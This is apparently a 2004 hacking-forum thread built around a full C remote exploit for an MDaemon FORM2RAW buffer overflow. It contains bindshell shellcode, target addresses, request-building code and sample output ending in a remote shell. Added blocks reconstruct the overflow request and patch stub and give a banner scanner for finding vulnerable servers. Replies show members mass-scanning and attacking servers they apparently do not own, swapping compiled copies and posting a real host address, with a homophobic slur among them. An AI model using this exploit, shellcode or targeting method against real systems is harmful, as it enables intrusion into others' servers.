stonebreaker
CODE
/*


       Copyright © Rosiello Security

       http://www.rosiello.org

        ================


<rave>                            ____________
<rave>   _.-----------------------/            `-,,
<rave> ,'       ;          ;   /                 `-._
<rave>;        ;          ; .')    \                `\
<rave>  `--------------------.'.'  _.-'`- .              `\
<rave>                      ;`---'-------.\,              `\ _
<rave>                     ;,      ;  .---`,               ` -
<rave>                     ;`      ; `.____;
<rave>                       `--------------'_  ,,
<rave>                      ,;       ;  .---`,  ` ._
<rave>                      ;;       ; `.____;   ___``````
<rave>                        `;--------------'   `
<rave>                         ,;     ;  .---`,
<rave>                        ;;     ; `.____;
<rave>                          `.------------'
<rave>                            ``----...__              _..=
<rave>         `````---=-.---``'`
         _
     | |_
   |_   _|
     |_|


    /\  \   We    /\  \   are  /\  \
     /::\  \ Black /::\  \  H@t  \:\  \
    /:/\:\  \     /:/\:\  \       \:\  \
   _::\~\:\  \   _::\~\:\  \      /::\  \
  /\ \:\ \:\__\ /\ \:\ \:\__\    /:/\:\__\
  \:\ \:\ \/__/ \:\ \:\ \/__/   /:/  \/__/
   \:\ \:\__\    \:\ \:\__\    /:/  /
    \:\/:/  /     \:\/:/  /   /:/  /
     \::/  /       \::/  /   /:/  /
      \/__/         \/__/    \/__/   airsupply@0x557.org
                                     http://www.0x557.org
   ================

--== Remote Exploit for Mdaemon version v6.85 and prior to 6.52 ==--
Code by: rave
Contact: rave@rosiello.org
Contact: airsupply@0x557.org
Date: March 2004


Bug found by: hat-squad security ( great job !! )

   "MDaemon offers a full range of mail server functionality. MDaemon protects your users from
spam and viruses, provides full security, includes seamless web access to your email via
WorldClient, remote administration, and much more!" FORM2RAW.exe is a CGI that allows users
to send emails using MDaemon via a web page. It processes the fields of an HTML form and
creates a raw message file in the raw queue directory of the MDaemon mail server. This file then
will be processed and queued for delivery by MDaemon. An attacker can cause a buffer overflow
in MDaemon by issuing a malformed CGI request to FORM2RAW.exe.



  According to the Help file "By default, MDaemon 6.52 or higher will not send emails created by
Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the
MDaemon server. If you want to disable this behavior you can set the FromCheck=No in FORM2RAW.INI
file".

   Sending more than 153 bytes in the "From" field to Form2Raw.exe creates a raw file that, when processed
by MDaemon, will cause a stack buffer overflow. The EIP register will be overwritten when the From field
length is 249 bytes.


Do I need to say more? This is 0wnage, 0ldsch00l style. Have fun..
This spawns a waiting bindshell on the victim's computer on port 58821.


PS:
The exploit has only been tested on Windows XP Home and Pro edition (Dutch) SP1, and the stack
has proven to be very bumpy. So please don't yell at me if the exploit doesn't work on your
operating system .. thanks


The demo mode of the exploit shows in the debugger the following
EAX = 00000000 EBX = 00000000 ECX = 014D1BD8 EDX = 01090000 ESI = 014C6000 EDI = 01AEF1A8
EIP = 42424242 ESP = 01AEEEE8 EBP = 0005E668

Note: Demo mode works on all operating systems

Usage <C:\Mdeamon>Mdeamon_exp.exe <target host> <target number>
Target Number           Target Name                             Stack Address
=============           ===========                             =============
0                       Demo                                    0x42424242
1                       Windows XP HOME [NL]                    0x014D4DFC
2                       Windows XP PRO [NL]                     0x014D4DFC


<C:\Mdeamon> Mdeamon_exp localhost 1
[+] Winsock Inalized
[+] Trying to connect to localhost:3000
[+] socket inalized
[+] Overflowing string is Prepared
[+] Connected
[+] Overflowing string had been send

<C:\> telnet localhost 58821
Microsoft Windows XP [versie 5.1.2600]
C) Copyright 1985-2001 Microsoft Corp.

D:\MDaemon\APP>






Special Thanks to:
airsupply { 0x557 security r0cked me, thanks for your part and cooperation bro }
Silicon  { Unofficial sources told me you're a Rosiello member; good, I lent your bindcode, TY 100% }
Sam   { once again 0x557, thanks for the chat although it was a short one }
Dragnet  { Always willing to help me out }
Angelo  { Very very good friend }
Punix  { Last time I forgot you girl ! :( I'm so sorry }


Greetz go out to:
NrAziz  { This is my brother; anyone who touches him touches me, so please make my day ! }
sloth  { good guy }
Mercy  { Hope to see you soon }
Netric security    { www.netric.org/.be   }
0x557  security (SST) { www.0x557.org   }
[+] All the hax0rs I forgot.

This was Rosiello's first cooperation with the 0x557 people, who have proven to be
really nice. In the past Rosiello has worked with the (now dead) DSR, also known as dtors
security research, but (and it's a personal wish) I hope that 0x557 will still be so nice to
us. I feel called to give a great big shoutout to these people for their work now and
in the future !! Keep on doing the great job !


 Bad sounds of these days  {
 I can't remember anything, can't tell if this is true or a dream. Deep down inside I
 feel the scream, this terrible silence stops me. Now that the war is through with me I'm waking
 up, I cannot see that there is nothing left of me, nothing is real but pain now.

 }

The original advisory can be found at: http://hat-squad.com/bugreport/mdaemon-raw.txt
The mirrored advisory can be found at: http://www.securiteam.com/windowsntfocus/5ZP050ABPY.htm
Our own advisory can be found at     : http://www.rosiello.org/en/read_bugs.php?17

!!!DO NOT USE THIS CODE ON MACHINES OTHER THAN YOUR OWN!!!
Respect the law as we do!

I'm outa here bye bye !
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

// Winsock 2 import library (MSVC); with other compilers link ws2_32 explicitly
#pragma comment(lib, "ws2_32.lib")

// true when the string is already a dotted quad (inet_addr() returns INADDR_NONE otherwise)
#define ISIP(m) (!(inet_addr(m) ==-1))

// request offset of the return address: 23-byte "get /form2raw.cgi?From=" prefix + 244 From bytes
#define offset 267 //;267 //1024

// NOP sled placed in the Body field in front of the _me stub and the bindshell
#define NOPS "\x90\x90\x90\x90\x90\x90\x90"


struct sh_fix
{
unsigned long _wsasock;
unsigned long _bind;
unsigned long _listen;
unsigned long _accept;
unsigned long _stdhandle;
unsigned long _system;
};

struct remote_targets {
 char *os;
 unsigned long sh_addr;    // stack address written over EIP (points at the NOP sled)
 struct sh_fix _sh_fix;    // absolute API addresses patched into the bindshell
} target [] ={
/* Option`s for your eyes only :D*/
 { "Demo                ",
    0x42424242,
   {  0x90909090,
      0x90909090,
      0x90909090,
      0x90909090,
      0x90909090,// <--
      0x90909090,
   },
 },

 { "Windows XP HOME [NL]",
    0x014D4DFC,
   {  0x71a35a01,   // WSASocketA
      0x71a33ece,   // bind
      0x71a35de2,   // listen
      0x71a3868d,   // accept
      0x77e6191d,// <-- SetStdHandle; the 0x19 is turned into 0x20 at run time by _me
      0x77bf8044,   // system
   },
 },

 { "Windows XP PRO [NL]",
    0x014D4DFC,
   {  0x71a35a01,   // WSASocketA
      0x71a33ece,   // bind
      0x71a35de2,   // listen
      0x71a3868d,   // accept
      0x77e6191d,// <-- SetStdHandle; the 0x19 is turned into 0x20 at run time by _me
      0x77bf8044,   // system
   },
 }
};


unsigned char _addy [] =
"\x90\x90\x90\x90";


// 116 bytes bindcode for windows,(NTlike) port=58821, by silicon :)
// w000w you rule !!
unsigned char shellcode[] =

"\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
"\x6A\x01\x6A\x02\xB8"
"\xAA\xAA\xAA\xAA"
"\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
"\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
"\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
"\xBB\xBB\xBB\xBB"
"\xFF\xD0\x6A\x01\x53\xB8"
"\xCC\xCC\xCC\xCC"
"\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
"\xDD\xDD\xDD\xDD"
"\xFF\xD0\x8B\xD8\xBA"
"\xEE\xEE\xEE\xEE"
"\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
"\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
"\x6D\x64\x8D\x45\xFC\x50\xB8"
"\xFF\xFF\xFF\xFF"
"\xFF\xD0\x41";



/* The funny thing is that while exploiting this bug one of the addresses
 (see target[1 || 2]._sh_fix._stdhandle) had a forbidden character (0x20 aka space). To fix this I wrote
 this addy/mini shellcode to replace the 0x19 (that's not supposed to be there) in the
 SetStdHandle() address inside the shellcode with a 0x20.
 */

unsigned char _me [] =
"\x33\xC9"              //  xor         ecx,ecx
"\xBE\xAA\xAA\xAA\xAA"            //  mov         esi,offset _shellcode (00421a50)
"\x83\xC1\x1F"             //  add         ecx,1Fh
"\x41"                //  inc         ecx
"\x66\x89\x4E\x50"           //  mov         word ptr [esi+50h],cx
"\xC6\x46\x51\xE6";           //  mov         byte ptr [esi+51h],0E6h



// Resolve a host name or dotted quad to a network-order IPv4 address.
u_long get_ip(char *hostname)
{
struct  hostent    *hp;

if (ISIP(hostname)) return inet_addr(hostname);

 if ((hp = gethostbyname(hostname))==NULL)
 { fprintf(stderr,"[!] gethostbyname() failed (WSA error %d); check the existence of the host.\n",WSAGetLastError());
   exit(-1); }

 // The original returned inet_ntoa()'s string through a u_long and main()
 // then ran inet_addr() over that number, which is why connect() failed;
 // hand back the raw address instead.
 return *((u_long *)hp->h_addr);
}



int fix_shellcode ( int choise )
{
// where the bindshell ends up: the stack address EIP is pointed at, plus the
// NOP sled and the _me stub that precede it in the Body field
unsigned long only_xp =target[choise].sh_addr+strlen(NOPS)+strlen(_me);


 memcpy(_me+3,((char *)&only_xp),4);


 //0xf offset to the adres of  WSASocketA
 memcpy(shellcode+0xf,((char *)&target[choise]._sh_fix._wsasock),4);

 //0x30 offset to the adres of bind
 memcpy(shellcode+0x30,((char *)&target[choise]._sh_fix._bind),4);

 //0x3a offset to the adres of listen
 memcpy(shellcode+0x3a,((char *)&target[choise]._sh_fix._listen),4);

 //0x46 offset to the adres of _accept
 memcpy(shellcode+0x46,((char *)&target[choise]._sh_fix._accept),4);

 //0x4f offset to the adres of SetStdHandle
 memcpy(shellcode+0x4f,((char *)&target[choise]._sh_fix._stdhandle),4);

 //0x6e offset to the adres of SYSTEM
 memcpy(shellcode+0x6e,((char *)&target[choise]._sh_fix._system),4);

return 0;

}
/// oooh yeah uuuh right .... Crap dont you uuh yeah at me you know me !
int usage (char *what)
{
int i;

 fprintf(stdout,"Copyright (c) Rosiello Security\n");
 fprintf(stdout,"http://www.rosiello.org\n\n");
 fprintf(stdout,"Usage %s <target host> <target number>\n",what);
 fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Address\n");
 fprintf(stdout,"=============\t\t===========\t\t\t\t=============\n");

 // walk the target table instead of hard-coding three entries
 for (i=0;i < (int)(sizeof(target)/sizeof(target[0]));i++)
  fprintf(stdout,"%d\t\t\t%s\t\t0x%08lx\n",i,target[i].os,target[i].sh_addr);

 exit(0);
}


int main(int argc,char **argv)

{


char buffer[offset*4]="get /form2raw.cgi?From=",*ptr,*address;
int sd,oops,i,choise;
struct  sockaddr_in  ooh;


WSADATA wsadata;
WSAStartup(0x101, &wsadata);

// both arguments are required; the original checked for one and then read argv[2] anyway
if (argc < 3) usage(argv[0]);
address=argv[1];
choise=atoi(argv[2]);
if (choise < 0 || choise >= (int)(sizeof(target)/sizeof(target[0]))) usage(argv[0]);
fix_shellcode(choise);

fprintf(stdout,"[+] Winsock Inalized\n");

 /* Lets start making a litle setup
   Change the port if you have to */

 ooh.sin_addr.s_addr = get_ip(address);   // already network order, no second inet_addr()
   ooh.sin_port        = htons(3000);
   ooh.sin_family      = AF_INET;


fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,3000);


// ok ok here`s ur sock()
sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
 // the original tested "!sd<0", which is never true; check the Winsock sentinel instead
 if (sd == INVALID_SOCKET) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); }

 fprintf(stdout,"[+] socket inalized\n");


 /* Initialising the exploit buffer; read the file comments for the details.
    buffer[] is zero-filled beyond the literal, so the 0x40 filler stays
    NUL-terminated for the strlen()/sprintf() below. */
ptr=buffer+strlen(buffer);

for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x40;   // From bytes 1..244

/* "%.4s" emits exactly the four return-address bytes; the original's "%s" on
   &sh_addr kept copying the following struct members until it met a zero byte. */
sprintf(buffer+strlen(buffer),"%.4s%s&To=airsupply@0x557.org&Subject=hi&Body=%s%s%s HTTP/1.0\r\n\r\n",
      ((char *)&target[choise].sh_addr),_addy,NOPS,_me,shellcode);





//memcpy(buffer+35,shellcode,strlen(shellcode));

fprintf(stdout,"[+] Overflowing string is Prepared\n");

 // Knock knock ... hi i want to hook up with you
 oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));
  if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); }

// yep wher`e in :D
fprintf(stdout,"[+] Connected\n");


// Sending some Dangerous stuff
i = send(sd,buffer,strlen(buffer),0);
// same precedence slip as the socket() check; SOCKET_ERROR is -1
if (i == SOCKET_ERROR) { fprintf (stderr,"[!] Send() failed\n"); exit (-1); }

fprintf(stdout,"[+] Overflowing string had been send\n");




// Bring in the cleaners !!
WSACleanup();

// [EOF]
return 0;

}

It looks like you can get a shell,
but I cannot compile it with lcc.
If anyone compiles it successfully, please publish it. Thx
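The request layout in the code above and the byte-patching trick in its `_me` stub, as an added example that is not part of the original post or of rave's code. It builds the same bytes on a buffer and sends nothing: `build_request()` places the 4-byte return address 267 bytes into the request (after 244 From bytes, which matches the "EIP overwritten at 249 bytes" observation in the header), and `make_patch_stub()` generates the `xor ecx,ecx / mov esi / add ecx / inc ecx / mov [esi+off],cx / mov byte [esi+off+1]` sequence the exploit uses to write a 0x20 into the SetStdHandle address at run time. Two things here are my assumptions, not the page's: the bad-byte set beyond 0x20 (NUL, `&`, `=`) and the generalisation of the stub to any forbidden byte value (the original hard-codes 0x1F + 1).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Layout constants of the request the exploit sends. RET_AT is the exploit's
 * "offset" define: the return address starts 267 bytes into the request,
 * i.e. after the 23-byte prefix and 244 filler bytes of the From field. */
#define REQ_PREFIX "get /form2raw.cgi?From="
#define REQ_PREFIX_LEN (sizeof(REQ_PREFIX) - 1)           /* 23 */
#define RET_AT 267
#define FROM_PAD (RET_AT - REQ_PREFIX_LEN)                /* 244 */

/* Bytes that cannot be carried in the From field. 0x20 is the one the author
 * hit (see the _me comment); NUL ends the C string the exploit builds, and
 * '&' / '=' would split the form field. The last three are an assumption
 * about the form decoding, not something the page states. */
static int is_bad_byte(uint8_t b)
{
    return b == 0x00 || b == 0x20 || b == '&' || b == '=';
}

/* Index of the first bad byte in buf, or -1 when it is clean. */
int first_bad_byte(const uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (is_bad_byte(buf[i])) return (int)i;
    return -1;
}

static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void write_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Emit a stub of the same shape as the exploit's _me. The shellcode ships a
 * placeholder (0x19) where the address needs a forbidden byte; at run time
 * the stub builds the real value in ecx and stores it. The 16-bit store of cx
 * also zeroes the byte after `off`, so next_byte is written back afterwards.
 * k (the number of "inc ecx") grows until the add immediate is itself clean;
 * the exploit fixes k = 1 (0x1F + 1 = 0x20). sc_addr is where the shellcode
 * will sit in memory (the exploit's only_xp). Returns the stub length, 0 when
 * off does not fit an 8-bit displacement. Host endianness does not matter. */
size_t make_patch_stub(uint32_t sc_addr, uint8_t off, uint8_t value,
                       uint8_t next_byte, uint8_t *out)
{
    size_t n = 0;
    unsigned k = 1;
    if (off > 0x7E) return 0;
    while (is_bad_byte((uint8_t)(value - k))) k++;
    out[n++] = 0x33; out[n++] = 0xC9;                              /* xor ecx,ecx        */
    out[n++] = 0xBE; write_le32(out + n, sc_addr); n += 4;         /* mov esi,sc_addr    */
    out[n++] = 0x83; out[n++] = 0xC1; out[n++] = (uint8_t)(value - k); /* add ecx,imm8   */
    for (unsigned i = 0; i < k; i++) out[n++] = 0x41;              /* inc ecx (k times)  */
    out[n++] = 0x66; out[n++] = 0x89; out[n++] = 0x4E; out[n++] = off; /* mov [esi+off],cx */
    out[n++] = 0xC6; out[n++] = 0x46; out[n++] = (uint8_t)(off + 1); out[n++] = next_byte; /* mov byte [esi+off+1],imm8 */
    return n;
}

/* The two stores the stub performs, applied to a buffer so the effect can be
 * checked without executing anything. */
void emulate_patch_stub(uint8_t *sc, uint8_t off, uint8_t value, uint8_t next_byte)
{
    sc[off] = value;          /* low half of cx */
    sc[off + 1] = 0x00;       /* high half of cx clobbers the next byte ... */
    sc[off + 1] = next_byte;  /* ... which the byte store puts back */
}

/* Assemble the request with an exact 4-byte copy of the return address. body
 * is what goes into the Body field (NOP sled, stub, bindshell). Returns the
 * request length, 0 when cap is too small. */
size_t build_request(uint32_t ret_addr, const uint8_t *body, size_t body_len,
                     uint8_t *out, size_t cap)
{
    static const char mid[] = "&To=airsupply@0x557.org&Subject=hi&Body=";
    static const char end[] = " HTTP/1.0\r\n\r\n";
    size_t n = 0;
    if (cap < REQ_PREFIX_LEN + FROM_PAD + 8 + (sizeof(mid) - 1) + body_len + (sizeof(end) - 1))
        return 0;
    memcpy(out + n, REQ_PREFIX, REQ_PREFIX_LEN); n += REQ_PREFIX_LEN;
    memset(out + n, 0x40, FROM_PAD);             n += FROM_PAD;        /* From bytes 1..244   */
    write_le32(out + n, ret_addr);               n += 4;               /* From bytes 245..248 -> EIP */
    memset(out + n, 0x90, 4);                    n += 4;               /* the exploit's _addy */
    memcpy(out + n, mid, sizeof(mid) - 1);       n += sizeof(mid) - 1;
    memcpy(out + n, body, body_len);             n += body_len;
    memcpy(out + n, end, sizeof(end) - 1);       n += sizeof(end) - 1;
    return n;
}

/* Length of the From field as the CGI sees it (up to the first '&'). */
size_t from_field_len(const uint8_t *req, size_t n)
{
    size_t i = REQ_PREFIX_LEN;
    while (i < n && req[i] != '&') i++;
    return i - REQ_PREFIX_LEN;
}
```

Running `first_bad_byte()` over the finished From field and over the stub is the check the original never does; the `%s`-on-`&sh_addr` construction in the posted code would have failed it for every target, since it copies the whole address table after the four return-address bytes.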
R0x0r
No luck here. Why can't we compile? Hmmmm. Would be nice having the compiled version.
Nexcess
Way to repeat my post heh...

http://www.governmentsecurity.org/forum/index.php?showtopic=7298
stonebreaker
Oh sorry, I had not seen that you had posted it
hehe
but have you compiled it successfully?
som3aa
QUOTE (stonebreaker @ Mar 16 2004, 08:08 AM)
oh sorry i have not seen that you had post it
hehe
but have you compiled it succeed ?

No, he failed, that's what his post was about,
but thewatcher managed to compile it; it's in the beginner's section.
He made an autohaxor and added mdaemon. wink.gif
Go there, download it and get started.

Beware of the bitch when you run the program hehe tongue.gif
fre4k
Anybody got a shell with this remote exploit?

edit:

I`ve got this

C:\>nc.exe -vv 198.163.*.* 58821
gateway.coleandpartners.onramp.ca [198.163.180.194] 58821 (?) open#
_



But no shell ... huh.gif
morbido
could anyone compile this exploit ???
post it here plzZz
stonebreaker
I think the autohack someone posted only crashes the daemon,
and the one I posted can get a shell
rvd
The autohacker did not work on my local network nor on my local PC, and I still haven't been able to compile the code above sad.gif
z3r0
Compiled version posted here:
http://www.governmentsecurity.org/forum/in...e=post&id=55822
IIzedII
hmm guys, which port do you have to scan for the daemon?
sry for my english - im just a german faget .P
Trackmaster
im thinking port 25 - but i may be wrong ?

IIzedII
QUOTE (Trackmaster @ Mar 16 2004, 07:47 PM)
and thats faggot m8 not fagget

first i said faget and not fagget
and second, you can say faget or faggot - for example JD says "faget" tongue.gif
but that's another thing...
hmm port 25 - there you will find a lot of mail servers ^^ but not only mdaemon..
do you guys think mdaemon is an often used program?
icu2l8
You scan for port 389 (>scan.txt) and check using scanline on port 25
sl.exe -bhpt 25 -f scan.txt -o vulnerable.txt
for the mdaemon mailer....
The same as the imail exploit scanning smile.gif
DHS
I think 3000 is the port to scan. That's where the web interface listens.

http://www.securitytracker.com/alerts/2003/Dec/1008572.html

Not sure if I have the same exploit here... but it came out first on Google and has the same vulnerable versions.

And if it is another exploit, it still might be a good reason to scan on port 3000, because the web interface is installed by default, so most of the mdaemon servers will have that port open tongue.gif

GreetZ
brOmstar
port 3000, not 389. What are you talking about? Read the source. Btw it's only for XP NL.. you have to change the offsets if I'm not wrong
usch
I think it's 3000, isn't it ???

regards

edit:oh it`s been posted before, didn`t notice it.sorry
icu2l8
Checked what DHS just said...
and yes... port 3000 works too smile.gif
But you have to check on port 25 that this is MDAEMON and
what the version of MDAEMON is smile.gif
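The port-25 check the last few posts describe, as an added example that is not from the thread or from any of the posters. It takes the 220 greeting a mail server sends on connect, pulls the MDaemon version out of it and flags 6.8.5 and below (the "v6.85 and prior" range in the exploit header; the thread writes versions as 6.85/6.52, so a two-part number is read as major.minor.patch). The "ESMTP MDaemon x.y.z" banner wording and the sample greetings are constructed assumptions, not captured output; an administrator can change the banner, so this is triage, and the web interface on port 3000 still has to be there for the Form2Raw path to matter.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Highest affected version named on this page: 6.8.5 ("v6.85 and prior"). */
static const int LAST_AFFECTED[3] = {6, 8, 5};

/* Pull "MDaemon x.y.z" out of a 220 greeting. Returns 1 and fills v[3] when
 * the banner names MDaemon with a version, 0 otherwise. A two-part number
 * such as "6.85" is read as 6.8.5, the way the thread writes versions. */
int parse_mdaemon_version(const char *banner, int v[3])
{
    const char *p = strstr(banner, "MDaemon");
    int parts[3] = {0, 0, 0}, np = 0;
    if (!p) return 0;
    p += strlen("MDaemon");
    /* skip "  v" style prefixes but stop at the end of the product token */
    while (*p && !isdigit((unsigned char)*p)) {
        if (*p == ';' || *p == '\r' || *p == '\n') return 0;
        p++;
    }
    while (np < 3 && isdigit((unsigned char)*p)) {
        char *end;
        parts[np++] = (int)strtol(p, &end, 10);
        p = end;
        if (*p != '.') break;
        p++;
    }
    if (np == 0) return 0;
    if (np == 2 && parts[1] >= 10) {        /* "6.85" -> 6.8.5, "6.52" -> 6.5.2 */
        parts[2] = parts[1] % 10;
        parts[1] /= 10;
    }
    memcpy(v, parts, sizeof parts);
    return 1;
}

/* -1: not an MDaemon banner; 0: MDaemon newer than 6.8.5; 1: 6.8.5 or older. */
int classify_banner(const char *banner)
{
    int v[3];
    if (!parse_mdaemon_version(banner, v)) return -1;
    for (int i = 0; i < 3; i++) {
        if (v[i] < LAST_AFFECTED[i]) return 1;
        if (v[i] > LAST_AFFECTED[i]) return 0;
    }
    return 1;                                 /* exactly 6.8.5 */
}

/* Constructed sample greetings (not captured from real hosts). */
static const char *SAMPLE_BANNERS[] = {
    "220 mail.example.net ESMTP MDaemon 6.8.5; Tue, 16 Mar 2004 20:22:15 +0100\r\n",
    "220 mail.example.net ESMTP MDaemon v6.52; Tue, 16 Mar 2004 20:22:15 +0100\r\n",
    "220 mail.example.net ESMTP MDaemon 7.0.1; Tue, 16 Mar 2004 20:22:15 +0100\r\n",
    "220 mx.example.org ESMTP Sendmail 8.12.11/8.12.11; Tue, 16 Mar 2004 20:22:15 +0100\r\n",
};

/* Number of sample greetings that classify_banner() flags as affected. */
int count_affected(void)
{
    int hits = 0;
    for (size_t i = 0; i < sizeof SAMPLE_BANNERS / sizeof SAMPLE_BANNERS[0]; i++)
        if (classify_banner(SAMPLE_BANNERS[i]) == 1) hits++;
    return hits;
}
```

Feed it the first line read from port 25 of each host that answered on 3000; hosts returning -1 or 0 are dropped before anything is sent to Form2Raw.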
XpProf
QUOTE (icu2l8 @ Mar 16 2004, 08:22 PM)
Checked what DHS just have said...
and yes... port 3000 works also smile.gif
But you have to check on port 25 that this is MDAEMON smile.gif

I think that few server use mdaemon... sad.gif

Xp
icu2l8
After checking 10 servers, I don't see that any of the exploits really works smile.gif
z3r0
Shouldn't we go to the chat room ppl?
icu2l8
Go to the chat room smile.gif (where is it anyhow ?)
We stay here...
I hope someone will show a proof today for this exploit smile.gif
icu2l8
Will someone tell me why all the time ...

[+] Winsock Inalized
[+] Trying to connect to 216.41.x.x:3000
[+] socket inalized
[+] Overflowing string is Prepared
[!] connect() failed.

connect failed ?
z3r0
under the banner...members,calendar... wink.gif
eclipze
QUOTE (icu2l8 @ Mar 16 2004, 08:39 PM)
Will someone tell me why all the time ...

[+] Winsock Inalized
[+] Trying to connect to 216.41.x.x:3000
[+] socket inalized
[+] Overflowing string is Prepared
[!] connect() failed.

connect failed ?

yes, I'm also getting this; I tried about 50 servers with mdaemon v6.85
maybe the compiled exploit isn't right?
XpProf
QUOTE (icu2l8 @ Mar 16 2004, 08:39 PM)
Will someone tell me why all the time ...

[+] Winsock Inalized
[+] Trying to connect to 216.41.x.x:3000
[+] socket inalized
[+] Overflowing string is Prepared
[!] connect() failed.

connect failed ?

I get the same error... blink.gif
icu2l8
Will someone change the language of the exploit to english...
Maybe then it will work better smile.gif
SkitZZ
don't know why you peeps don't just read through the code unsure.gif

CODE
The exploit has only been tested on Windows XP Home and Pro edition (Dutch) SP1, and the stack
has proven to be very bumpy. So please don't yell at me if the exploit doesn't work on your
operating system .. thanks


CODE
C:\Mdeamon> Mdeamon_exp localhost 1
[+] Winsock Inalized
[+] Trying to connect to localhost : 3000
[+] socket inalized
[+] Overflowing string is Prepared
[+] Connected
[+] Overflowing string had been send


next time look through the code before you start spamming and ruin the thread for others mad.gif


SkitZZ
eclipze
it says:

CODE

[!] connect() failed.


of course I read the code, I tried it on Dutch hosts.
I don't think "connect() failed." has anything to do with connecting to a Dutch server or not...

but how come you can connect..? weird this..
som3aa
Guys for me it connects and sends exploit. tongue.gif
but i sc@nned a huge no. and got nothing sad.gif
-Arthy-
Haven't tried it yet, but now I will biggrin.gif

I'll post my experience here too
Don't think I will get any results if I read all the posts above anyway...
I got XP SP1 (dutch) tongue.gif

Peace out...
DaClueless

Tested Locally on VMware versions of OS:

Eng Win 2000 SP3 - DOS
Eng Win 2000 SP4 - DOS
Eng XP SP0 - DOS
Eng XP SP1 - DOS

so no luck finding a working exploit.
Frippo
I havent been able to get any shell yet either..
TheOther
I've tested it too on a Dutch XP SP1. No luck, it keeps telling me it couldn't connect.
I've tried to exploit this locally but it couldn't connect.
I think there is something wrong with this code. What do you guys think?
mysoulmustfly
Bug found by: hat-squad security ( great job !! )

thx from iranian security Group

hat-squad.com
Damned_Vampire
you have to take the getip function out of the source code,
then it won't give a connect() failed error and it will work
make2004
QUOTE (IIzedII @ Mar 16 2004, 07:43 PM)
hmm guys for which port you have to scan for daemon?
sry for my english - im just a german faget .P

Thanks .I See
mysoulmustfly
I use nc and tell nc to listen on port 3000 UDP and TCP
but nothing happened
is it a VIRUS ?
TheOther
Maybe you could share your code with us, Damned_Vampire?
Black_hat
Hello
This exploit is working on an XP box ... And our exploit just sends the buffer overflow command to the mdaemon server; we don't publish the other exploit on a public site (exploit bound with a shell). We'll publish a new vulnerability this week smile.gif



Black_Hat
--------------
Member oF Hat-Squad Security Research Team
redcorp
can someone post a proper version thats not screwed up
wizy
anyone have a working copy of this yet? one with a shell?